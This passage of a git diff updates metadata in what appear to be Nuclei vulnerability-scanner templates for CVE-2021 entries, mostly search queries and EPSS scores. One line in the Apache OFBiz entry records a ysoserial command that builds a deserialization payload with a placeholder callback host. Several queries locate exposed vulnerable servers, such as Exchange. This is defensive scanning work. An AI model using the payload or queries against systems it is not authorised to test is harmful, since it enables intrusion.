cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve,cve2021,cacti,xss http: diff --git a/http/cves/2021/CVE-2021-26292.yaml b/http/cves/2021/CVE-2021-26292.yaml index 5ecd600175..9cc5d1279f 100644 --- a/http/cves/2021/CVE-2021-26292.yaml +++ b/http/cves/2021/CVE-2021-26292.yaml @@ -16,7 +16,9 @@ info: max-request: 1 vendor: AfterLogic product: AfterLogic Aurora & WebMail - fofa-query: "X-Server: AfterlogicDAVServer" + fofa-query: + - "X-Server: AfterlogicDAVServer" + - "x-server: afterlogicdavserver" tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic http: diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index 927eacdbd7..1f8caae574 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: afterlogic product: aurora - fofa-query: "X-Server: AfterlogicDAVServer" + fofa-query: + - "X-Server: AfterlogicDAVServer" + - "x-server: afterlogicdavserver" tags: cve2021,cve,afterlogic,exposure,AfterLogic http: diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 197400d710..bb71d92ba6 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -30,9 +30,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: "OFBiz.Visitor=" + shodan-query: + - "OFBiz.Visitor=" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex - fofa-query: body="ofbiz" tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 898b06b8b6..f8ef1160d4 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: impresscms product: impresscms - shodan-query: http.html:"ImpressCMS" + shodan-query: + - http.html:"ImpressCMS" + - cpe:"cpe:2.3:a:impresscms:impresscms" + - http.html:"impresscms" fofa-query: body="impresscms" tags: cve,cve2021,hackerone,impresscms,unauth,cms diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 5bcdcb6729..41efeb4b3a 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: microsoft product: exchange_server - shodan-query: vuln:CVE-2021-26855 - fofa-query: title="outlook" + shodan-query: + - vuln:CVE-2021-26855 + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 6f0dd6c4c8..73506d207b 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27310 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42925 + epss-percentile: 0.43249 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 3d3f2288f5..9f74dfe723 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -22,16 +22,18 @@ info: cve-id: CVE-2021-27330 cwe-id: CWE-79 epss-score: 0.00437 - epss-percentile: 0.74213 + epss-percentile: 0.74717 cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: triconsole product: datepicker_calendar - google-query: intitle:TriConsole.com - PHP Calendar Date Picker shodan-query: http.title:triconsole.com - php calendar date picker fofa-query: title=triconsole.com - php calendar date picker + google-query: + - intitle:TriConsole.com - PHP Calendar Date Picker + - intitle:triconsole.com - php calendar date picker tags: cve2021,cve,xss,edb,triconsole http: diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index a7a43ae8dc..839a9faa52 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,grafana,unauth diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 357e052f09..699a2f51aa 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: fudforum product: fudforum - shodan-query: 'http.html:"Powered by: FUDforum"' - fofa-query: 'body="powered by: fudforum"' + shodan-query: + - 'http.html:"Powered by: FUDforum"' + - http.html:"fudforum" + - 'http.html:"powered by: fudforum"' + fofa-query: + - 'body="powered by: fudforum"' + - body="fudforum" tags: cve2021,cve,xss,fudforum,edb,packetstorm http: diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index fa614240e8..ca034ef637 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -29,8 +29,13 @@ info: max-request: 2 vendor: fudforum product: fudforum - shodan-query: html:"FUDforum" - fofa-query: 'body="powered by: fudforum"' + shodan-query: + - html:"FUDforum" + - http.html:"fudforum" + - 'http.html:"powered by: fudforum"' + fofa-query: + - 'body="powered by: fudforum"' + - body="fudforum" tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum http: diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index f5093d00c2..ba8becd142 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27670 cwe-id: CWE-918 - epss-score: 0.58348 - epss-percentile: 0.97664 + epss-score: 0.61228 + epss-percentile: 0.97796 cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: appspace product: appspace - shodan-query: title:"Appspace" + shodan-query: + - title:"Appspace" + - http.title:"appspace" fofa-query: title="appspace" google-query: intitle:"appspace" tags: cve,cve2021,appspace,ssrf diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index d21940af9c..20f7526051 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -26,9 +26,16 @@ info: max-request: 2 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve2021,cve,apache,solr,ssrf http: diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index d4025871ed..8d2df8adee 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: acquia product: mautic - shodan-query: title:"Mautic" + shodan-query: + - title:"Mautic" + - http.title:"mautic" fofa-query: title="mautic" google-query: intitle:"mautic" tags: cve2021,cve,mautic,xss,acquia diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index d826940e2f..651989990e 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-28151 cwe-id: CWE-78 - epss-score: 0.96847 - epss-percentile: 0.99638 + epss-score: 0.96385 + epss-percentile: 0.99564 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index 5e777cc46d..e79da76836 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -23,7 +23,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2021,cve,rconfig,authenticated,lfi diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index a3db024d50..58ba081df6 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -26,7 +26,9 @@ info: max-request: 3 vendor: forgerock product: openam - shodan-query: http.title:"OpenAM" + shodan-query: + - http.title:"OpenAM" + - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" tags: cve2021,cve,openam,ldap,injection,forgerock diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index dd4cd80f70..705f62e550 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -24,8 +24,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve2021,cve,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 52150037d9..bf949ed3a8 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.8 cve-id: CVE-2021-29484 cwe-id: CWE-79 - epss-score: 0.01008 - epss-percentile: 0.82062 + epss-score: 0.01483 + epss-percentile: 0.86785 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index bfb9148867..3c9492f9cb 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -19,18 +19,22 @@ info: cvss-score: 6.1 cve-id: CVE-2021-29625 cwe-id: CWE-79 - epss-score: 0.00222 - epss-percentile: 0.60557 + epss-score: 0.00236 + epss-percentile: 0.61643 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adminer product: adminer - shodan-query: http.title:"login - adminer" - fofa-query: app="adminer" && body="4.7.8" - hunter-query: app.name="adminer"&&web.body="4.7.8" + shodan-query: + - http.title:"login - adminer" + - cpe:"cpe:2.3:a:adminer:adminer" + fofa-query: + - app="adminer" && body="4.7.8" + - title="login - adminer" google-query: intitle:"login - adminer" - tags: cve2021,cve,adminer,xss + hunter-query: app.name="adminer"&&web.body="4.7.8" + tags: cve2021,cve,adminer,xss,sqli http: - method: GET diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index f88bf16dde..fb0f76cc0d 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: app="Apache_OFBiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve2021,cve,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 430af33ded..2fbe4aec89 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: contribsys product: sidekiq - shodan-query: title:"Sidekiq" + shodan-query: + - title:"Sidekiq" + - http.title:"sidekiq" fofa-query: title="sidekiq" google-query: intitle:"sidekiq" tags: cve2021,cve,xss,sidekiq,authenticated,contribsys diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index e84522093d..5079a1b914 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: voipmonitor product: voipmonitor - shodan-query: http.title:"VoIPmonitor" + shodan-query: + - http.title:"VoIPmonitor" + - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" tags: cve2021,cve,rce,voipmonitor diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index f951cbae8d..c317eb1570 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -20,15 +20,21 @@ info: cvss-score: 6.5 cve-id: CVE-2021-31195 cwe-id: CWE-79 - epss-score: 0.92095 - epss-percentile: 0.98883 + epss-score: 0.92082 + epss-percentile: 0.98927 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: exchange_server - shodan-query: http.title:"Outlook" - fofa-query: title="outlook" + shodan-query: + - http.title:"Outlook" + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2021,cve,microsoft,exchange,owa,xss diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index 1cf253f02b..db25b63614 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3129 - epss-score: 0.97468 - epss-percentile: 0.99958 + epss-score: 0.97461 + epss-percentile: 0.99957 cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* metadata: max-request: 6 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 1f9557aa0f..fae99b6e09 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -28,7 +28,9 @@ info: vendor: beyondtrust product: appliance_base_software shodan-query: 'set-cookie: nsbase_session' - google-query: '"BeyondTrust" "Redistribution Prohibited"' + google-query: + - '"BeyondTrust" "Redistribution Prohibited"' + - '"beyondtrust" "redistribution prohibited"' tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar http: diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 32e43a9ad0..ab17ac7473 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: hitachi product: vantara_pentaho - shodan-query: Pentaho + shodan-query: + - Pentaho + - pentaho tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi http: diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 35b27b217d..3068d76bfe 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: automatedlogic product: webctrl - shodan-query: html:"/_common/lvl5/dologin.jsp" + shodan-query: + - html:"/_common/lvl5/dologin.jsp" + - http.html:"/_common/lvl5/dologin.jsp" fofa-query: body="/_common/lvl5/dologin.jsp" tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 7b1d9a38ef..49739deaaa 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2021,cve,apache,rce,struts,struts2,intrusive diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 996e0578de..27ff28a506 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -29,8 +29,12 @@ info: vendor: nodered product: node-red-dashboard framework: node.js - shodan-query: title:"Node-RED" - fofa-query: title="Node-RED" + shodan-query: + - title:"Node-RED" + - http.title:"node-red" + fofa-query: + - title="Node-RED" + - title="node-red" google-query: intitle:"node-red" tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index 8eb0ec9383..fb1ab567f9 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32682 cwe-id: CWE-22 - epss-score: 0.97293 - epss-percentile: 0.99854 + epss-score: 0.97312 + epss-percentile: 0.99872 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: max-request: 9 diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index f07fb8d440..ebe04e5e7c 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-32819 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.82753 - epss-percentile: 0.98332 + epss-score: 0.79486 + epss-percentile: 0.98284 cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 30cb8939c1..7e60b23e15 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3293 cwe-id: CWE-22 epss-score: 0.003 - epss-percentile: 0.68887 + epss-percentile: 0.69462 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 75ae78ab72..316579151c 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-33544 cwe-id: CWE-78 - epss-score: 0.9753 - epss-percentile: 0.99991 + epss-score: 0.97493 + epss-percentile: 0.99976 cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index 041384d150..90f483b42a 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: sap product: netweaver_development_infrastructure - shodan-query: html:"SAP NetWeaver" + shodan-query: + - html:"SAP NetWeaver" + - http.html:"sap netweaver" fofa-query: body="sap netweaver" tags: cve2021,cve,oast,ssrf,sap diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 0eb4aee6b5..9a328c8e7f 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: microsoft product: exchange_server - shodan-query: vuln:cve-2021-26855 - fofa-query: title="outlook" + shodan-query: + - vuln:cve-2021-26855 + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 60fdac9283..7a628b7c10 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: solarwinds product: serv-u - shodan-query: product:"Rhinosoft Serv-U httpd" + shodan-query: + - product:"Rhinosoft Serv-U httpd" + - product:"rhinosoft serv-u httpd" tags: cve2021,cve,solarwinds,traversal http: diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 05474adf1f..7c44f4757d 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: maxsite product: maxsite_cms - shodan-query: html:'content="MaxSite CMS' + shodan-query: + - html:'content="MaxSite CMS' + - http.html:'content="maxsite cms' fofa-query: body='content="maxsite cms' tags: cve2021,cve,maxsite,xss diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index d021d01f7b..1992bae6dd 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -10,20 +10,25 @@ info: reference: - https://github.com/bludit/bludit/issues/1327 - https://nvd.nist.gov/vuln/detail/CVE-2021-35323 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-35323 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55601 + epss-percentile: 0.55471 cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: bludit product: bludit - shodan-query: title:"Bludit" + shodan-query: + - title:"Bludit" + - http.title:"bludit" + fofa-query: title="bludit" + google-query: intitle:"bludit" tags: cve2021,cve,bludit,xss http: diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index b596169069..5df0c0315c 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - epss-score: 0.23467 - epss-percentile: 0.96147 + epss-score: 0.45222 + epss-percentile: 0.97404 cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 6e7608bbc4..75bf911c4a 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -31,7 +31,9 @@ info: max-request: 1 vendor: forgerock product: am - shodan-query: http.title:"OpenAM" + shodan-query: + - http.title:"OpenAM" + - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 34328efc7b..8c8d8d6662 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: thruk product: thruk - shodan-query: http.html:"Thruk" - fofa-query: body="thruk" + shodan-query: + - http.html:"Thruk" + - http.html:"thruk" + fofa-query: + - body="thruk" + - title=="thruk monitoring webinterface" tags: cve2021,cve,thruk,xss http: diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index deaa0807fd..67895a4fe6 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: oracle product: access_manager - shodan-query: http.title:"Oracle Access Management" - fofa-query: body="/oam/pages/css/login_page.css" + shodan-query: + - http.title:"Oracle Access Management" + - http.title:"oracle access management" + - http.html:"/oam/pages/css/login_page.css" + fofa-query: + - body="/oam/pages/css/login_page.css" + - title="oracle access management" google-query: intitle:"oracle access management" tags: cve2021,cve,oam,rce,java,unauth,oracle,kev diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 4ad10985e7..51263829b4 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -21,14 +21,16 @@ info: cve-id: CVE-2021-36450 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.61111 + epss-percentile: 0.61052 cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: verint product: workforce_optimization - shodan-query: title:"Verint Sign-in" + shodan-query: + - title:"Verint Sign-in" + - http.title:"verint sign-in" fofa-query: title="verint sign-in" google-query: intitle:"verint sign-in" tags: cve2021,cve,xss,verint diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index 8ffad535de..045e9f7006 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: icewarp product: icewarp_server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2021,cve,icewarp,redirect diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 6e6d4c5cd7..958d9aadf4 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: jeecg product: jeecg - shodan-query: title:"Jeecg-Boot" - fofa-query: title="JeecgBoot 企业级低代码平台" + shodan-query: + - title:"Jeecg-Boot" + - http.title:"jeecg-boot" + fofa-query: + - title="JeecgBoot 企业级低代码平台" + - title="jeecg-boot" + - title="jeecgboot 企业级低代码平台" google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 52963f665b..8260585af9 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: jeecg product: jeecg - shodan-query: title:"Jeecg-Boot" - fofa-query: title="JeecgBoot 企业级低代码平台" + shodan-query: + - title:"Jeecg-Boot" + - http.title:"jeecg-boot" + fofa-query: + - title="JeecgBoot 企业级低代码平台" + - title="jeecg-boot" + - title="jeecgboot 企业级低代码平台" google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 9f17e6143b..bcc936498f 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -27,9 +27,16 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adselfservice_plus - shodan-query: http.title:"ManageEngine" - fofa-query: title="manageengine" - google-query: intitle:"adselfservice plus" + shodan-query: + - http.title:"ManageEngine" + - http.title:"adselfservice plus" + - http.title:"manageengine" + fofa-query: + - title="manageengine" + - title="adselfservice plus" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: cve2021,cve,zoho,xss,zohocorp http: diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index c9fc082981..fd7d491e89 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37538 cwe-id: CWE-89 - epss-score: 0.02819 - epss-percentile: 0.90434 + epss-score: 0.01766 + epss-percentile: 0.87981 cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 diff --git 